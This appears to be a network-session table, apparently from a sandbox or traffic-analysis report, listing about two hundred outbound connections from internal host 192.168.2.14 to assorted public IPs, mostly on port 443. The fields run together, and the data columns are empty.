                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19181192.168.2.144937279.199.167.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19182192.168.2.1441206223.80.114.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19183192.168.2.145086623.42.151.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19184192.168.2.1455490138.115.47.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19185192.168.2.1448778141.25.232.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19186192.168.2.143653083.246.176.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19187192.168.2.1453264193.87.125.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19188192.168.2.1447274102.89.194.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19189192.168.2.143915443.187.71.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19190192.168.2.145647095.96.248.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19191192.168.2.144759264.59.131.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19192192.168.2.146098641.224.174.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19193192.168.2.143558272.138.43.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19194192.168.2.145365835.96.41.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19195192.168.2.143766448.250.156.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19196192.168.2.143388480.13.45.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19197192.168.2.145745049.155.22.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19198192.168.2.145778232.4.82.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19199192.168.2.1454772207.34.202.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19200192.168.2.1457268121.25.172.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19201192.168.2.1436330108.176.163.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19202192.168.2.1455080103.192.222.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19203192.168.2.1439132142.163.159.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19204192.168.2.144032825.27.238.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19205192.168.2.145373267.191.52.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19206192.168.2.1459386112.201.223.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19207192.168.2.1451606213.231.39.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19208192.168.2.1449118175.217.83.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19209192.168.2.1443786196.173.242.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19210192.168.2.143802448.205.201.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19211192.168.2.1443170147.111.110.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19212192.168.2.1449776134.29.35.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19213192.168.2.145093071.200.136.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19214192.168.2.1454272165.156.110.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19215192.168.2.145697278.122.222.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19216192.168.2.1438056130.211.146.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19217192.168.2.145890865.71.215.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19218192.168.2.1460164181.22.13.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19219192.168.2.1460886121.46.147.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19220192.168.2.1437598107.139.175.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19221192.168.2.1445032142.103.31.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19222192.168.2.145621424.30.30.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19223192.168.2.1438556187.43.216.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19224192.168.2.1439236155.9.72.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19225192.168.2.143746286.112.113.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19226192.168.2.1437306179.199.99.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19227192.168.2.143942652.220.214.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19228192.168.2.1443456184.151.4.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19229192.168.2.1432998210.247.193.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19230192.168.2.1451926189.221.237.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19231192.168.2.1453138107.110.139.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19232192.168.2.1445182109.185.183.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19233192.168.2.144018061.1.77.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19234192.168.2.1460796222.240.168.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19235192.168.2.1458854133.131.206.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19236192.168.2.1453808140.176.241.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19237192.168.2.1436310193.105.243.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19238192.168.2.1455322134.64.89.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19239192.168.2.145061019.31.189.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19240192.168.2.1433538146.127.21.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19241192.168.2.14446689.98.48.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19242192.168.2.145143842.226.72.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19243192.168.2.145404685.249.243.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19244192.168.2.14474562.95.225.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19245192.168.2.1458622182.208.68.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19246192.168.2.1447538149.44.71.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19247192.168.2.1435322108.88.48.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19248192.168.2.1443690102.113.128.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19249192.168.2.1439130177.131.68.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19250192.168.2.1454952187.120.134.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19251192.168.2.1456162194.212.91.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19252192.168.2.1434808107.248.54.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19253192.168.2.1439336123.89.114.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19254192.168.2.1438158132.71.199.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19255192.168.2.145336218.164.253.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19256192.168.2.1445486219.250.106.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19257192.168.2.145945043.251.216.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19258192.168.2.145763290.240.243.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19259192.168.2.1434606222.239.48.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19260192.168.2.144193671.255.223.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19261192.168.2.146087462.110.223.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19262192.168.2.145590614.249.12.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19263192.168.2.144463271.44.134.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19264192.168.2.143727070.132.51.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19265192.168.2.1441108138.147.94.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19266192.168.2.1453596145.182.43.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19267192.168.2.1449236175.158.99.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19268192.168.2.145572693.210.240.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19269192.168.2.143867844.223.49.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19270192.168.2.1458308141.158.189.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19271192.168.2.1456292194.28.171.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19272192.168.2.1436472199.119.66.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19273192.168.2.144845664.40.124.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19274192.168.2.144733234.190.20.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19275192.168.2.1460262218.149.109.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19276192.168.2.1453466173.69.22.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19277192.168.2.144093858.182.92.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19278192.168.2.1447366108.17.74.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19279192.168.2.145397625.215.189.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19280192.168.2.146058067.154.187.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19281192.168.2.1453858131.97.255.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19282192.168.2.143933288.94.129.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19283192.168.2.144066840.40.1.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19284192.168.2.1435262156.175.4.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19285192.168.2.144627450.48.246.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19286192.168.2.1442802108.10.42.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19287192.168.2.1456512143.23.48.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19288192.168.2.1459816183.233.107.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19289192.168.2.1444182160.203.55.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19290192.168.2.1447468136.121.161.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19291192.168.2.1433454194.243.79.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19292192.168.2.143954445.157.254.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19293192.168.2.1455956107.232.73.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19294192.168.2.145952467.150.178.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19295192.168.2.1447954199.136.161.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19296192.168.2.1443308187.32.54.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19297192.168.2.1440782184.77.43.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19298192.168.2.143610278.185.178.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19299192.168.2.1447970169.90.24.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19300192.168.2.145091442.69.143.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19301192.168.2.1447328149.47.187.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19302192.168.2.1459170200.116.39.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19303192.168.2.1453880151.65.103.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19304192.168.2.1441392196.88.202.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19305192.168.2.1441584138.155.34.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19306192.168.2.1434630152.28.46.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19307192.168.2.1438890160.196.72.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19308192.168.2.1450692115.212.147.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19309192.168.2.145519484.197.123.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19310192.168.2.145451643.2.153.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19311192.168.2.1435914170.158.33.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19312192.168.2.1460512192.75.54.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19313192.168.2.1434764157.57.111.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19314192.168.2.144709838.177.230.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19315192.168.2.144674077.149.16.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19316192.168.2.1443544221.177.141.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19317192.168.2.144872895.167.182.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19318192.168.2.1460366179.221.246.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19319192.168.2.1436194135.239.235.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19320192.168.2.1437232165.237.88.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19321192.168.2.144620620.241.40.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19322192.168.2.1456874213.3.74.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19323192.168.2.1440814141.215.112.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19324192.168.2.1459632138.228.166.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19325192.168.2.145335649.188.143.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19326192.168.2.143621250.154.132.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19327192.168.2.145765691.219.115.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19328192.168.2.1443146125.238.199.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19329192.168.2.143688681.166.89.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19330192.168.2.143857817.203.15.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19331192.168.2.1450000103.179.22.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19332192.168.2.1450834130.7.94.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19333192.168.2.1453480132.2.2.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19334192.168.2.1438016101.132.120.1748080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19335192.168.2.144188479.135.148.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19336192.168.2.143424837.237.74.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19337192.168.2.1443872108.135.39.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19338192.168.2.1436284178.62.177.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19339192.168.2.144601046.16.141.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19340192.168.2.145570266.184.55.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19341192.168.2.145529881.217.62.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19342192.168.2.1460736184.30.230.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19343192.168.2.1445806191.208.80.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19344192.168.2.143654482.230.123.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19345192.168.2.1437068162.100.191.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19346192.168.2.1435882146.252.44.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19347192.168.2.145776290.248.57.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19348192.168.2.1437934134.97.9.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19349192.168.2.145676646.251.121.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19350192.168.2.1436626146.204.245.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19351192.168.2.143350435.134.168.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19352192.168.2.1440570206.187.254.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19353192.168.2.1445656100.6.228.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19354192.168.2.144799636.105.223.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19355192.168.2.144136872.225.109.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19356192.168.2.1439874198.234.247.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19357192.168.2.145743269.99.83.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19358192.168.2.1456780140.7.114.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19359192.168.2.1448646155.6.138.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19360192.168.2.145209857.219.33.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19361192.168.2.144051249.25.233.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19362192.168.2.1443186186.150.186.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19363192.168.2.1442568148.201.33.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19364192.168.2.1446276186.216.33.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19365192.168.2.145033257.148.252.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19366192.168.2.143323014.102.169.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19367192.168.2.145095271.86.135.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19368192.168.2.1434954177.215.136.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19369192.168.2.144455847.176.101.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19370192.168.2.1455596139.203.130.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19371192.168.2.1433800184.32.212.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19372192.168.2.145354877.94.15.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19373192.168.2.1447992197.183.228.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19374192.168.2.1455554203.248.60.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19375192.168.2.1443094108.7.67.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19376192.168.2.1459254152.244.128.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19377192.168.2.1436774193.29.7.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19378192.168.2.14575762.205.49.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19379192.168.2.144160868.184.209.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19380192.168.2.1450620117.124.222.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19381192.168.2.1450814123.120.122.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19382192.168.2.144093679.44.206.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19383192.168.2.1434358158.206.217.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19384192.168.2.1442068131.230.102.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19385192.168.2.1448290130.206.197.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19386192.168.2.143431046.71.200.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19387192.168.2.1442542110.44.67.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19388192.168.2.1448984203.217.143.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19389192.168.2.143354294.158.147.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19390192.168.2.145778886.49.79.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19391192.168.2.1459554162.17.213.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19392192.168.2.1449118218.254.103.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
